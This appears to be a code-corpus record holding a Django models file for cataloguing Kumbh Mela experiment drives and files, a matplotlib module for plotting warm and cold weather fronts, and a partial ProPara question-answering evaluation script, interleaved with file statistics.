models.ForeignKey(Person, on_delete=models.CASCADE, help_text="Main contact person for this subexperiment.") name = models.CharField(max_length=100, help_text="Name of the subexperiment.") number = models.IntegerField(help_text="Number of the subexperiment.") description = models.TextField(max_length=1000, blank=True, help_text="Short description of the experiment (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on the subexperiment (optional).") @python_2_unicode_compatible class Format(models.Model): """ Table/model to represent a file format, i.e., the format in which output of a sensor is stored """ extension = models.CharField(max_length=50, help_text="Extension of the file (in small letters!), e.g., '.txt' and not '.TXT'.") description = models.TextField(max_length=10000, blank=True, help_text="Description of the file format (optional).") @python_2_unicode_compatible class Location(models.Model): """ Table/model to represent a (geo)location """ latitude = models.FloatField(blank=True, help_text="Optional.") longitude = models.FloatField(blank=True, help_text="Optional.") description = models.TextField(max_length=1000, blank=True, help_text="Description of the location (optional).") @python_2_unicode_compatible class Sensor(models.Model): """ Table/model to represent a sensor (e.g., camera/GPS device) """ sensor_type = models.CharField(max_length=100, help_text="Short description of the sensor, e.g., 'GoPro Camera'.") location = models.ManyToManyField(Location, blank=True, help_text="The location for this sensor (optional).") format = models.ManyToManyField(Format, blank=True, help_text="The format for the output of this sensor (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes for this sensor (optional).") @python_2_unicode_compatible class Source(models.Model): """ Table/model to represent a data source (e.g., 'Local police') """ name = models.CharField(max_length=200, help_text="Name of the data source (e.g., 'Local Police')") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this data source (optional).") @python_2_unicode_compatible class File(models.Model): """ The main table/model for this app. It is used to keep track of all files on the various drives for the Kumbh Mela experiment. """ # a file can be stored a several drives: drive = models.ManyToManyField(Drive, through='StorageLocation', help_text="The drives on which the file is stored.") format = models.ForeignKey(Format, on_delete=models.CASCADE, blank=True, null=True, help_text="Format of the file (optional).") experiment = models.ManyToManyField(Experiment, blank=True, help_text="The subexperiment this file belongs to (optional).") source = models.ForeignKey(Source, on_delete=models.CASCADE, blank=True, null=True, help_text="The data source (optional).") sensor = models.ForeignKey(Sensor, on_delete=models.CASCADE, blank=True, null=True, help_text="Sensor used to obtain the data (optional).") location = models.ForeignKey(Location, on_delete=models.CASCADE, blank=True, null=True, help_text="Location where the recording took place (optional).") time_added = models.DateTimeField(auto_now=True, blank=True, help_text="Time when the drive was added to the drive bay (optional).") size = models.IntegerField(blank=True, null=True, help_text="Size in bytes (optional).") start_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording started (optional).") end_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording ended (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this file (optional).") def __str__(self): """Returns the file path""" filepaths = set() n_copies = 0 # the number of copies for storagelocation in self.storagelocation_set.all(): filepaths.add(storagelocation.path) n_copies += 1 if n_copies == 1: return ', '.join(filepaths) + ' (1 copy)' return ', '.join(filepaths) + ' (%s copies)'%(int(n_copies)) class StorageLocation(models.Model): """ A location where a specific file is stored. This model/table links files and drives together. (Each file can be stored on multiple drives under different names). """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE) file = models.ForeignKey(File, on_delete=models.CASCADE) path = models.CharField(max_length=300, help_text="Path of the file on the drive.")
33.883333
107
0.688269
from django.db import models from django.utils.encoding import python_2_unicode_compatible """ Contains the models/tables for the kumbhmela_db.sqlite3 database. Every field has (when necessary) a 'help_text' that explains the meaning of the field. """ __author__ = "Louis Dijkstra" @python_2_unicode_compatible class Drive(models.Model): """ Table/model to represent (a collection of) drive(s). """ label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5'.") external = models.BooleanField(default=False, help_text="True when the drive is external and false otherwise.") time_added = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was added to the drive bay.") time_removed = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was removed from the drive bay.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this (collection of) drive(s) (optional).") def __str__(self): return self.label @python_2_unicode_compatible class DriveCopy(models.Model): """ Every Drive might have several copies. This table/model is used to keep track of them. """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE, help_text="The unique drive it is a copy of.") label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5II'.") number = models.IntegerField(help_text="Drive copy number.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this drive copy (optional).") def __str__(self): return self.label @python_2_unicode_compatible class Person(models.Model): """ Table/Model to represent a person """ name = models.CharField(max_length=100, help_text="First and last name.") email = models.CharField(max_length=200, blank=True, help_text="Email address(es) (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes (optional).") def __str__(self): return self.name @python_2_unicode_compatible class Experiment(models.Model): """ Table/Model to represent the various subexperiments """ # every experiment is linked to a contact person contactperson = models.ForeignKey(Person, on_delete=models.CASCADE, help_text="Main contact person for this subexperiment.") name = models.CharField(max_length=100, help_text="Name of the subexperiment.") number = models.IntegerField(help_text="Number of the subexperiment.") description = models.TextField(max_length=1000, blank=True, help_text="Short description of the experiment (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on the subexperiment (optional).") def __str__(self): return "%s (subexperiment %d)"%(self.name, self.number) @python_2_unicode_compatible class Format(models.Model): """ Table/model to represent a file format, i.e., the format in which output of a sensor is stored """ extension = models.CharField(max_length=50, help_text="Extension of the file (in small letters!), e.g., '.txt' and not '.TXT'.") description = models.TextField(max_length=10000, blank=True, help_text="Description of the file format (optional).") def __str__(self): return self.extension @python_2_unicode_compatible class Location(models.Model): """ Table/model to represent a (geo)location """ latitude = models.FloatField(blank=True, help_text="Optional.") longitude = models.FloatField(blank=True, help_text="Optional.") description = models.TextField(max_length=1000, blank=True, help_text="Description of the location (optional).") @python_2_unicode_compatible class Sensor(models.Model): """ Table/model to represent a sensor (e.g., camera/GPS device) """ sensor_type = models.CharField(max_length=100, help_text="Short description of the sensor, e.g., 'GoPro Camera'.") location = models.ManyToManyField(Location, blank=True, help_text="The location for this sensor (optional).") format = models.ManyToManyField(Format, blank=True, help_text="The format for the output of this sensor (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes for this sensor (optional).") def __str__(self): return self.sensor_type @python_2_unicode_compatible class Source(models.Model): """ Table/model to represent a data source (e.g., 'Local police') """ name = models.CharField(max_length=200, help_text="Name of the data source (e.g., 'Local Police')") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this data source (optional).") def __str__(self): return self.name @python_2_unicode_compatible class File(models.Model): """ The main table/model for this app. It is used to keep track of all files on the various drives for the Kumbh Mela experiment. """ # a file can be stored a several drives: drive = models.ManyToManyField(Drive, through='StorageLocation', help_text="The drives on which the file is stored.") format = models.ForeignKey(Format, on_delete=models.CASCADE, blank=True, null=True, help_text="Format of the file (optional).") experiment = models.ManyToManyField(Experiment, blank=True, help_text="The subexperiment this file belongs to (optional).") source = models.ForeignKey(Source, on_delete=models.CASCADE, blank=True, null=True, help_text="The data source (optional).") sensor = models.ForeignKey(Sensor, on_delete=models.CASCADE, blank=True, null=True, help_text="Sensor used to obtain the data (optional).") location = models.ForeignKey(Location, on_delete=models.CASCADE, blank=True, null=True, help_text="Location where the recording took place (optional).") time_added = models.DateTimeField(auto_now=True, blank=True, help_text="Time when the drive was added to the drive bay (optional).") size = models.IntegerField(blank=True, null=True, help_text="Size in bytes (optional).") start_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording started (optional).") end_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording ended (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this file (optional).") def __str__(self): """Returns the file path""" filepaths = set() n_copies = 0 # the number of copies for storagelocation in self.storagelocation_set.all(): filepaths.add(storagelocation.path) n_copies += 1 if n_copies == 1: return ', '.join(filepaths) + ' (1 copy)' return ', '.join(filepaths) + ' (%s copies)'%(int(n_copies)) class StorageLocation(models.Model): """ A location where a specific file is stored. This model/table links files and drives together. (Each file can be stored on multiple drives under different names). """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE) file = models.ForeignKey(File, on_delete=models.CASCADE) path = models.CharField(max_length=300, help_text="Path of the file on the drive.") def __str__(self): return "File %s on Drive %s"%(self.path, self.drive.label)
231
0
195
7cbb4eae4e6ffdbfc230e0a6bca2576aecfb51ea
8,954
py
Python
generalexam/plotting/front_plotting.py
thunderhoser/GeneralExam
95b99a16fdaa67dae69586c7f7c76e27ccd4b89a
[ "MIT" ]
4
2019-05-10T11:03:48.000Z
2020-10-19T08:04:09.000Z
generalexam/plotting/front_plotting.py
thunderhoser/GeneralExam
95b99a16fdaa67dae69586c7f7c76e27ccd4b89a
[ "MIT" ]
null
null
null
generalexam/plotting/front_plotting.py
thunderhoser/GeneralExam
95b99a16fdaa67dae69586c7f7c76e27ccd4b89a
[ "MIT" ]
3
2020-11-19T08:16:31.000Z
2021-03-04T02:30:15.000Z
"""Plotting methods for warm and cold fronts.""" import numpy import matplotlib matplotlib.use('agg') import matplotlib.colors from gewittergefahr.gg_utils import longitude_conversion as lng_conversion from gewittergefahr.gg_utils import error_checking from generalexam.ge_utils import front_utils from generalexam.plotting import narr_plotting DEFAULT_WARM_FRONT_COLOUR = numpy.array([228., 26., 28.]) / 255 DEFAULT_COLD_FRONT_COLOUR = numpy.array([31., 120., 180.]) / 255 DEFAULT_LINE_WIDTH = 2. DEFAULT_LINE_STYLE = 'solid' DEFAULT_GRID_OPACITY = 0.5 DEFAULT_WF_MARKER_TYPE = 'o' DEFAULT_CF_MARKER_TYPE = '>' DEFAULT_MARKER_SPACING_METRES = 150000. DEFAULT_MARKER_SIZE = 12 DEFAULT_MARKER_COLOUR = numpy.array([31, 120, 180], dtype=float) / 255 def get_colour_map_for_grid(): """Returns colour map for frontal grid (to be used by `plot_frontal_grid`). N = number of colours :return: colour_map_object: Instance of `matplotlib.colors.ListedColormap`. :return: colour_norm_object: Instance of `matplotlib.colors.BoundaryNorm`. :return: colour_bounds: length-(N + 1) numpy array of colour boundaries. colour_bounds[0] and colour_bounds[1] are the boundaries for the 1st colour; colour_bounds[1] and colour_bounds[2] are the boundaries for the 2nd colour; ...; etc. """ main_colour_list = [DEFAULT_WARM_FRONT_COLOUR, DEFAULT_COLD_FRONT_COLOUR] colour_map_object = matplotlib.colors.ListedColormap(main_colour_list) colour_map_object.set_under(numpy.array([1., 1., 1.])) colour_map_object.set_over(numpy.array([1., 1., 1.])) main_colour_bounds = numpy.array( [front_utils.WARM_FRONT_INTEGER_ID - 0.5, front_utils.WARM_FRONT_INTEGER_ID + 0.5, front_utils.COLD_FRONT_INTEGER_ID]) colour_norm_object = matplotlib.colors.BoundaryNorm( main_colour_bounds, colour_map_object.N) colour_bounds = numpy.concatenate(( numpy.array([-100.]), main_colour_bounds, numpy.array([100.]))) return colour_map_object, colour_norm_object, colour_bounds def plot_front_with_markers( line_latitudes_deg, line_longitudes_deg, axes_object, basemap_object, marker_spacing_metres=DEFAULT_MARKER_SPACING_METRES, marker_type=None, front_type_string=None, marker_colour=DEFAULT_MARKER_COLOUR, marker_size=DEFAULT_MARKER_SIZE): """Plots front with markers (instead of a line). P = number of points in line :param line_latitudes_deg: length-P numpy array of latitudes (deg N). :param line_longitudes_deg: length-P numpy array of longitudes (deg E). :param axes_object: Front will be plotted on these axes (instance of `matplotlib.axes._subplots.AxesSubplot`). :param basemap_object: Basemap used to convert lat-long coordinates to x-y (instance of `mpl_toolkits.basemap.Basemap`). :param marker_spacing_metres: Spacing between successive markers. :param marker_type: Marker type (any format accepted by matplotlib). :param front_type_string: [used only if `marker_type is None`] Front type (determines marker type). :param marker_colour: Marker colour (any format accepted by matplotlib). :param marker_size: Marker size (any format accepted by matplotlib). """ error_checking.assert_is_valid_lat_numpy_array(line_latitudes_deg) error_checking.assert_is_numpy_array(line_latitudes_deg, num_dimensions=1) num_points = len(line_latitudes_deg) these_expected_dim = numpy.array([num_points], dtype=int) error_checking.assert_is_numpy_array( line_longitudes_deg, exact_dimensions=these_expected_dim) line_longitudes_deg = lng_conversion.convert_lng_positive_in_west( line_longitudes_deg) error_checking.assert_is_greater(marker_spacing_metres, 0.) if marker_type is None: front_utils.check_front_type(front_type_string) if front_type_string == front_utils.WARM_FRONT_STRING_ID: marker_type = DEFAULT_WF_MARKER_TYPE else: marker_type = DEFAULT_CF_MARKER_TYPE x_coords_metres, y_coords_metres = basemap_object( line_longitudes_deg, line_latitudes_deg) for i in range(num_points - 1): this_x_diff_metres = x_coords_metres[i + 1] - x_coords_metres[i] this_y_diff_metres = y_coords_metres[i + 1] - y_coords_metres[i] this_distance_metres = numpy.sqrt( this_x_diff_metres ** 2 + this_y_diff_metres ** 2) this_num_points = 1 + int(numpy.ceil( this_distance_metres / marker_spacing_metres )) these_x_coords_metres = numpy.linspace( x_coords_metres[i], x_coords_metres[i + 1], num=this_num_points) these_y_coords_metres = numpy.linspace( y_coords_metres[i], y_coords_metres[i + 1], num=this_num_points) axes_object.plot( these_x_coords_metres, these_y_coords_metres, linestyle='None', marker=marker_type, markerfacecolor=marker_colour, markeredgecolor=marker_colour, markersize=marker_size, markeredgewidth=0.1) def plot_polyline( latitudes_deg, longitudes_deg, basemap_object, axes_object, front_type=None, line_colour=None, line_width=DEFAULT_LINE_WIDTH, line_style=DEFAULT_LINE_STYLE): """Plots either warm front or cold front as polyline. P = number of points in polyline :param latitudes_deg: length-P numpy array of latitudes (deg N). :param longitudes_deg: length-P numpy array of longitudes (deg N). :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param front_type: Type of front (string). Used only to determine line colour (if `line_colour` is left as None). :param line_colour: Colour (in any format accepted by `matplotlib.colors`). Defaults to `DEFAULT_WARM_FRONT_COLOUR` or `DEFAULT_COLD_FRONT_COLOUR`. :param line_width: Line width (real positive number). :param line_style: Line style (in any format accepted by `matplotlib.lines`). """ error_checking.assert_is_valid_lat_numpy_array(latitudes_deg) error_checking.assert_is_numpy_array(latitudes_deg, num_dimensions=1) num_points = len(latitudes_deg) longitudes_deg = lng_conversion.convert_lng_positive_in_west(longitudes_deg) error_checking.assert_is_numpy_array( longitudes_deg, exact_dimensions=numpy.array([num_points])) if line_colour is None: front_utils.check_front_type(front_type) if front_type == front_utils.WARM_FRONT_STRING_ID: line_colour = DEFAULT_WARM_FRONT_COLOUR else: line_colour = DEFAULT_COLD_FRONT_COLOUR x_coords_metres, y_coords_metres = basemap_object( longitudes_deg, latitudes_deg) axes_object.plot( x_coords_metres, y_coords_metres, color=line_colour, linestyle=line_style, linewidth=line_width) def plot_narr_grid( frontal_grid_matrix, axes_object, basemap_object, first_row_in_narr_grid=0, first_column_in_narr_grid=0, opacity=DEFAULT_GRID_OPACITY): """Plots NARR grid points intersected by a warm front or cold front. This method plots data over a contiguous subset of the NARR grid, which need not be *strictly* a subset. In other words, the "subset" could be the full NARR grid. :param frontal_grid_matrix: See documentation for `front_utils.frontal_grid_to_points`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param first_row_in_narr_grid: Row 0 in the subgrid is row `first_row_in_narr_grid` in the full NARR grid. :param first_column_in_narr_grid: Column 0 in the subgrid is row `first_column_in_narr_grid` in the full NARR grid. :param opacity: Opacity for colour map (in range 0...1). """ error_checking.assert_is_integer_numpy_array(frontal_grid_matrix) error_checking.assert_is_numpy_array(frontal_grid_matrix, num_dimensions=2) error_checking.assert_is_geq_numpy_array( frontal_grid_matrix, numpy.min(front_utils.VALID_INTEGER_IDS) ) error_checking.assert_is_leq_numpy_array( frontal_grid_matrix, numpy.max(front_utils.VALID_INTEGER_IDS) ) colour_map_object, _, colour_bounds = get_colour_map_for_grid() frontal_grid_matrix = numpy.ma.masked_where( frontal_grid_matrix == front_utils.NO_FRONT_INTEGER_ID, frontal_grid_matrix) narr_plotting.plot_xy_grid( data_matrix=frontal_grid_matrix, axes_object=axes_object, basemap_object=basemap_object, colour_map=colour_map_object, colour_minimum=colour_bounds[1], colour_maximum=colour_bounds[-2], first_row_in_narr_grid=first_row_in_narr_grid, first_column_in_narr_grid=first_column_in_narr_grid, opacity=opacity)
42.436019
80
0.742573
"""Plotting methods for warm and cold fronts.""" import numpy import matplotlib matplotlib.use('agg') import matplotlib.colors from gewittergefahr.gg_utils import longitude_conversion as lng_conversion from gewittergefahr.gg_utils import error_checking from generalexam.ge_utils import front_utils from generalexam.plotting import narr_plotting DEFAULT_WARM_FRONT_COLOUR = numpy.array([228., 26., 28.]) / 255 DEFAULT_COLD_FRONT_COLOUR = numpy.array([31., 120., 180.]) / 255 DEFAULT_LINE_WIDTH = 2. DEFAULT_LINE_STYLE = 'solid' DEFAULT_GRID_OPACITY = 0.5 DEFAULT_WF_MARKER_TYPE = 'o' DEFAULT_CF_MARKER_TYPE = '>' DEFAULT_MARKER_SPACING_METRES = 150000. DEFAULT_MARKER_SIZE = 12 DEFAULT_MARKER_COLOUR = numpy.array([31, 120, 180], dtype=float) / 255 def get_colour_map_for_grid(): """Returns colour map for frontal grid (to be used by `plot_frontal_grid`). N = number of colours :return: colour_map_object: Instance of `matplotlib.colors.ListedColormap`. :return: colour_norm_object: Instance of `matplotlib.colors.BoundaryNorm`. :return: colour_bounds: length-(N + 1) numpy array of colour boundaries. colour_bounds[0] and colour_bounds[1] are the boundaries for the 1st colour; colour_bounds[1] and colour_bounds[2] are the boundaries for the 2nd colour; ...; etc. """ main_colour_list = [DEFAULT_WARM_FRONT_COLOUR, DEFAULT_COLD_FRONT_COLOUR] colour_map_object = matplotlib.colors.ListedColormap(main_colour_list) colour_map_object.set_under(numpy.array([1., 1., 1.])) colour_map_object.set_over(numpy.array([1., 1., 1.])) main_colour_bounds = numpy.array( [front_utils.WARM_FRONT_INTEGER_ID - 0.5, front_utils.WARM_FRONT_INTEGER_ID + 0.5, front_utils.COLD_FRONT_INTEGER_ID]) colour_norm_object = matplotlib.colors.BoundaryNorm( main_colour_bounds, colour_map_object.N) colour_bounds = numpy.concatenate(( numpy.array([-100.]), main_colour_bounds, numpy.array([100.]))) return colour_map_object, colour_norm_object, colour_bounds def plot_front_with_markers( line_latitudes_deg, line_longitudes_deg, axes_object, basemap_object, marker_spacing_metres=DEFAULT_MARKER_SPACING_METRES, marker_type=None, front_type_string=None, marker_colour=DEFAULT_MARKER_COLOUR, marker_size=DEFAULT_MARKER_SIZE): """Plots front with markers (instead of a line). P = number of points in line :param line_latitudes_deg: length-P numpy array of latitudes (deg N). :param line_longitudes_deg: length-P numpy array of longitudes (deg E). :param axes_object: Front will be plotted on these axes (instance of `matplotlib.axes._subplots.AxesSubplot`). :param basemap_object: Basemap used to convert lat-long coordinates to x-y (instance of `mpl_toolkits.basemap.Basemap`). :param marker_spacing_metres: Spacing between successive markers. :param marker_type: Marker type (any format accepted by matplotlib). :param front_type_string: [used only if `marker_type is None`] Front type (determines marker type). :param marker_colour: Marker colour (any format accepted by matplotlib). :param marker_size: Marker size (any format accepted by matplotlib). """ error_checking.assert_is_valid_lat_numpy_array(line_latitudes_deg) error_checking.assert_is_numpy_array(line_latitudes_deg, num_dimensions=1) num_points = len(line_latitudes_deg) these_expected_dim = numpy.array([num_points], dtype=int) error_checking.assert_is_numpy_array( line_longitudes_deg, exact_dimensions=these_expected_dim) line_longitudes_deg = lng_conversion.convert_lng_positive_in_west( line_longitudes_deg) error_checking.assert_is_greater(marker_spacing_metres, 0.) if marker_type is None: front_utils.check_front_type(front_type_string) if front_type_string == front_utils.WARM_FRONT_STRING_ID: marker_type = DEFAULT_WF_MARKER_TYPE else: marker_type = DEFAULT_CF_MARKER_TYPE x_coords_metres, y_coords_metres = basemap_object( line_longitudes_deg, line_latitudes_deg) for i in range(num_points - 1): this_x_diff_metres = x_coords_metres[i + 1] - x_coords_metres[i] this_y_diff_metres = y_coords_metres[i + 1] - y_coords_metres[i] this_distance_metres = numpy.sqrt( this_x_diff_metres ** 2 + this_y_diff_metres ** 2) this_num_points = 1 + int(numpy.ceil( this_distance_metres / marker_spacing_metres )) these_x_coords_metres = numpy.linspace( x_coords_metres[i], x_coords_metres[i + 1], num=this_num_points) these_y_coords_metres = numpy.linspace( y_coords_metres[i], y_coords_metres[i + 1], num=this_num_points) axes_object.plot( these_x_coords_metres, these_y_coords_metres, linestyle='None', marker=marker_type, markerfacecolor=marker_colour, markeredgecolor=marker_colour, markersize=marker_size, markeredgewidth=0.1) def plot_polyline( latitudes_deg, longitudes_deg, basemap_object, axes_object, front_type=None, line_colour=None, line_width=DEFAULT_LINE_WIDTH, line_style=DEFAULT_LINE_STYLE): """Plots either warm front or cold front as polyline. P = number of points in polyline :param latitudes_deg: length-P numpy array of latitudes (deg N). :param longitudes_deg: length-P numpy array of longitudes (deg N). :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param front_type: Type of front (string). Used only to determine line colour (if `line_colour` is left as None). :param line_colour: Colour (in any format accepted by `matplotlib.colors`). Defaults to `DEFAULT_WARM_FRONT_COLOUR` or `DEFAULT_COLD_FRONT_COLOUR`. :param line_width: Line width (real positive number). :param line_style: Line style (in any format accepted by `matplotlib.lines`). """ error_checking.assert_is_valid_lat_numpy_array(latitudes_deg) error_checking.assert_is_numpy_array(latitudes_deg, num_dimensions=1) num_points = len(latitudes_deg) longitudes_deg = lng_conversion.convert_lng_positive_in_west(longitudes_deg) error_checking.assert_is_numpy_array( longitudes_deg, exact_dimensions=numpy.array([num_points])) if line_colour is None: front_utils.check_front_type(front_type) if front_type == front_utils.WARM_FRONT_STRING_ID: line_colour = DEFAULT_WARM_FRONT_COLOUR else: line_colour = DEFAULT_COLD_FRONT_COLOUR x_coords_metres, y_coords_metres = basemap_object( longitudes_deg, latitudes_deg) axes_object.plot( x_coords_metres, y_coords_metres, color=line_colour, linestyle=line_style, linewidth=line_width) def plot_narr_grid( frontal_grid_matrix, axes_object, basemap_object, first_row_in_narr_grid=0, first_column_in_narr_grid=0, opacity=DEFAULT_GRID_OPACITY): """Plots NARR grid points intersected by a warm front or cold front. This method plots data over a contiguous subset of the NARR grid, which need not be *strictly* a subset. In other words, the "subset" could be the full NARR grid. :param frontal_grid_matrix: See documentation for `front_utils.frontal_grid_to_points`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param first_row_in_narr_grid: Row 0 in the subgrid is row `first_row_in_narr_grid` in the full NARR grid. :param first_column_in_narr_grid: Column 0 in the subgrid is row `first_column_in_narr_grid` in the full NARR grid. :param opacity: Opacity for colour map (in range 0...1). """ error_checking.assert_is_integer_numpy_array(frontal_grid_matrix) error_checking.assert_is_numpy_array(frontal_grid_matrix, num_dimensions=2) error_checking.assert_is_geq_numpy_array( frontal_grid_matrix, numpy.min(front_utils.VALID_INTEGER_IDS) ) error_checking.assert_is_leq_numpy_array( frontal_grid_matrix, numpy.max(front_utils.VALID_INTEGER_IDS) ) colour_map_object, _, colour_bounds = get_colour_map_for_grid() frontal_grid_matrix = numpy.ma.masked_where( frontal_grid_matrix == front_utils.NO_FRONT_INTEGER_ID, frontal_grid_matrix) narr_plotting.plot_xy_grid( data_matrix=frontal_grid_matrix, axes_object=axes_object, basemap_object=basemap_object, colour_map=colour_map_object, colour_minimum=colour_bounds[1], colour_maximum=colour_bounds[-2], first_row_in_narr_grid=first_row_in_narr_grid, first_column_in_narr_grid=first_column_in_narr_grid, opacity=opacity)
0
0
0
8688bd25c08e7e8ca794f9c3a84a55b513d0107f
20,875
py
Python
propara/evaluation/evalQA.py
keisks/propara
49fa8fe0481291df18b2c7b48e7ba1dafaad48e2
[ "Apache-2.0" ]
84
2018-06-02T02:00:53.000Z
2022-03-13T12:17:42.000Z
propara/evaluation/evalQA.py
keisks/propara
49fa8fe0481291df18b2c7b48e7ba1dafaad48e2
[ "Apache-2.0" ]
3
2018-10-31T00:28:31.000Z
2020-05-12T01:06:53.000Z
propara/evaluation/evalQA.py
keisks/propara
49fa8fe0481291df18b2c7b48e7ba1dafaad48e2
[ "Apache-2.0" ]
13
2018-09-14T20:37:51.000Z
2021-03-23T09:24:49.000Z
import sys, collections, pylev from stemming.porter2 import stem #-------------------------------------------------------------- # Author: Scott Wen-tau Yih # Usage: evalQA.py para-ids gold-labels system-predictions # example usage: python propara/eval/evalQA.py tests/fixtures/eval/para_id.test.txt tests/fixtures/eval/gold_labels.test.tsv tests/fixtures/eval/sample.model.test_predictions.tsv #-------------------------------------------------------------- # Data structure for Labels ''' PID -> [TurkerLabels] TurkerLabels = [TurkerQuestionLabel1, TurkerQuestionLabel2, ... ] # labels on the same paragraph from the same Turker TurkerQuestionLabel -> (SID, Participant, Type, From, To) ''' TurkerQuestionLabel = collections.namedtuple('TurkerQuestionLabel', 'sid participant event_type from_location to_location') # Data structure for Predictions ''' PID -> Participant -> SID -> PredictionRecord ''' PredictionRecord = collections.namedtuple('PredictionRecord', 'pid sid participant from_location to_location') # Fixing tokenization mismatch while alinging participants manual_participant_map = { 'alternating current':'alternate current', 'fixed nitrogen':'nitrogen', 'living things':'live thing', 'red giant star':'star', 'refrigerent liquid':'liquid', 'remains of living things':'remains of live thing', "retina's rods and cones":"retina 's rod and cone" } #, 'seedling':'seed'} #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- ''' Read the gold file containing all records where an entity undergoes some state-change: create/destroy/move. ''' #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- # Q1: Is participant X created during the process? # Q2: Participant X is created during the process. At which step is it created? # Q3: Participant X is created at step Y, and the initial location is known. Where is the participant after it is created? #---------------------------------------------------------------------------------------------------------------- # Q4: Is participant X destroyed during the process? # Q5: Participant X is destroyed during the process. At which step is it destroyed? # Q6: Participant X is destroyed at step Y, and its location before destroyed is known. Where is the participant right before it is destroyed? #---------------------------------------------------------------------------------------------------------------- # Q7 Does participant X move during the process? # Q8 Participant X moves during the process. At which steps does it move? # Q9 Participant X moves at step Y, and its location before step Y is known. What is its location before step Y? # Q10 Participant X moves at step Y, and its location after step Y is known. What is its location after step Y? #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- if __name__ == "__main__": main()
42.689162
179
0.57988
import sys, collections, pylev from stemming.porter2 import stem #-------------------------------------------------------------- # Author: Scott Wen-tau Yih # Usage: evalQA.py para-ids gold-labels system-predictions # example usage: python propara/eval/evalQA.py tests/fixtures/eval/para_id.test.txt tests/fixtures/eval/gold_labels.test.tsv tests/fixtures/eval/sample.model.test_predictions.tsv #-------------------------------------------------------------- # Data structure for Labels ''' PID -> [TurkerLabels] TurkerLabels = [TurkerQuestionLabel1, TurkerQuestionLabel2, ... ] # labels on the same paragraph from the same Turker TurkerQuestionLabel -> (SID, Participant, Type, From, To) ''' TurkerQuestionLabel = collections.namedtuple('TurkerQuestionLabel', 'sid participant event_type from_location to_location') # Data structure for Predictions ''' PID -> Participant -> SID -> PredictionRecord ''' PredictionRecord = collections.namedtuple('PredictionRecord', 'pid sid participant from_location to_location') # Fixing tokenization mismatch while alinging participants manual_participant_map = { 'alternating current':'alternate current', 'fixed nitrogen':'nitrogen', 'living things':'live thing', 'red giant star':'star', 'refrigerent liquid':'liquid', 'remains of living things':'remains of live thing', "retina's rods and cones":"retina 's rod and cone" } #, 'seedling':'seed'} #---------------------------------------------------------------------------------------------------------------- def compare_to_gold_labels(participants, system_participants): ret = [] found = False for p in participants: p = p.lower() if p in system_participants: ret.append(p) continue for g in system_participants: if (pylev.levenshtein(p,g) < 3): #print (p, "===", g) ret.append(g) found = True if not found: if p in manual_participant_map: ret.append(manual_participant_map[p]) #else: # print("cannot find", p, system_participants) return ret def preprocess_locations(locations): ret = [] for loc in locations: if loc == '-': ret.append('null') elif loc == '?': ret.append('unk') else: ret.append(loc) return ret def preprocess_question_label(sid, participant, event_type, from_location, to_location, system_participants=None): # check if there are multiple participants grouped together participants = [x.strip() for x in participant.split(';')] # check if there are multiple locations grouped together from_locations = preprocess_locations([x.strip() for x in from_location.split(';')]) # check if there are multiple locations grouped together to_locations = preprocess_locations([x.strip() for x in to_location.split(';')]) #print(participant, participants, system_participants) if system_participants != None: # check if the participants are in his list participants = compare_to_gold_labels(participants, system_participants) #print("legit_participants =", participants) #print(from_location, from_locations) #print(to_location, to_locations) return [TurkerQuestionLabel(sid, p, event_type, floc, tloc) for p in participants for floc in from_locations for tloc in to_locations] #---------------------------------------------------------------------------------------------------------------- ''' Read the gold file containing all records where an entity undergoes some state-change: create/destroy/move. ''' def readLabels(fnLab, selPid=None, gold_labels=None): fLab = open(fnLab) fLab.readline() # skip header ret = {} TurkerLabels = [] for ln in fLab: f = ln.rstrip().split('\t') if len(f) == 0 or len(f) == 1: if not selPid or pid in selPid: if pid not in ret: ret[pid] = [] ret[pid].append(TurkerLabels) TurkerLabels = [] elif len(f) != 11: sys.stderr.write("Error: the number of fields in this line is irregular: " + ln) sys.exit(-1) else: if f[1] == '?': continue pid, sid, participant, event_type, from_location, to_location = int(f[0]), int(f[1]), f[3], f[4], f[5], f[6] if gold_labels and selPid and pid in selPid: #print("pid=", pid) TurkerLabels += preprocess_question_label(sid, participant, event_type, from_location, to_location, gold_labels[pid].keys()) else: TurkerLabels += preprocess_question_label(sid, participant, event_type, from_location, to_location) #TurkerLabels 